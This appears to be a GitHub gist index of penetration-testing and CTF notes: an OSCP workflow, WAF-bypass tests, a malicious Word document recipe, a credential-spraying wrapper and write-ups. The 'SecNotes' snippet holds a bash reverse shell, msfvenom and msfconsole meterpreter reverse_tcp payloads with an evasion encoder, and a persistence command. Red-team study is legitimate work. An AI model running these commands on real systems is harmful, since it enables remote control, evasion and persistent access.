@secfb
secfb / offsec.md
Created April 26, 2018 07:25 — forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@secfb
secfb / secnot
Created May 17, 2018 10:40
SecNotes
python -c 'import pty; pty.spawn("/bin/sh")'
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run"
run persistence -A -i 10 -p 6767 -r 192.168.0.24
@secfb
secfb / enum.sh
Created May 17, 2018 10:42 — forked from unfo/enum.sh
Linux priv esc. Might be outdated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscan from the CLI; nmap run from within msfconsole so that the loot is stored in the database.

@secfb
secfb / sqlmap-tamper-scripts-evaluation.md
Created May 26, 2018 22:32 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The table below presents the results of tests launched against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.

The names below are the values to be passed to the --tamper= parameter of sqlmap.

The Violation Rating column represents the most dominant rating among the topmost 20 requests observed by F5 in its Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@secfb
secfb / muti-stage-1.md
Created May 26, 2018 22:35 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The paper below documents the process of creating a multi-stage, IPS/AV-transparent malicious document for the purposes of Red Teaming / Penetration-Testing assignments.

The resulting document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining the commands to be executed from the document's Author property and passing them to the StdIn of the Powershell.exe process
  • leveraging the certutil technique to receive a Base64-encoded malicious HTA document
  • having a Base64-encoded Powershell command in that Author property
@secfb
secfb / smb_cme_credspray.sh
Created May 28, 2018 12:04 — forked from ryan-wendel/smb_cme_credspray.sh
A wrapper around CrackMapExec to help prevent locking accounts when credential spraying SMB services.
#!/bin/bash
HOST="$1"
USERS="$2"
PASSWORDS="$3"
SLEEP="$4"
EMAIL="idrinkyourmilkshake@foobarbbq.com"
TEXT="7205551234@mms.att.net"
@secfb
secfb / CTFWRITE-Optimum-HTB.md
Created May 28, 2018 12:23 — forked from berzerk0/CTFWRITE-Optimum-HTB.md
CTF-Writeup: Optimum @ HackTheBox

This gist has been DEPRECATED.

Updates will be reflected on GITPAGE VERSIONS ONLY

CTF Writeup: Optimum on HackTheBox

30 October 2017

Introduction

This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box.

@secfb
secfb / matryoshka.sh
Created July 7, 2018 22:11
Matryoshka CTF
#!/bin/bash
# Unpack nested ("matryoshka") archives: each pass extracts every archive found
# under the current directory and deletes it once extraction succeeded, so the
# next pass sees the archives that were packed inside it.
LIMIT=500 # maximum number of passes
for ((i=1; i <= LIMIT; i++)); do
    # rm runs only when the extraction before it exited with status 0
    find . -name '*.rar' -exec unrar e {} \; -exec rm {} \;   # rar files
    #find . -name '*.7z' -exec 7za e {} \; -exec rm {} \;     # 7z files
    #find . -name '*.zip' -exec unzip {} \; -exec rm {} \;    # zip files
done
# Recursively nested rar, zip and 7z archives can be opened with this script.
# Матрёшка, Matryoshka CTF
@secfb
secfb / windows-toolkit.md
Created December 28, 2018 11:49 — forked from jthuraisamy/windows-toolkit.md
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed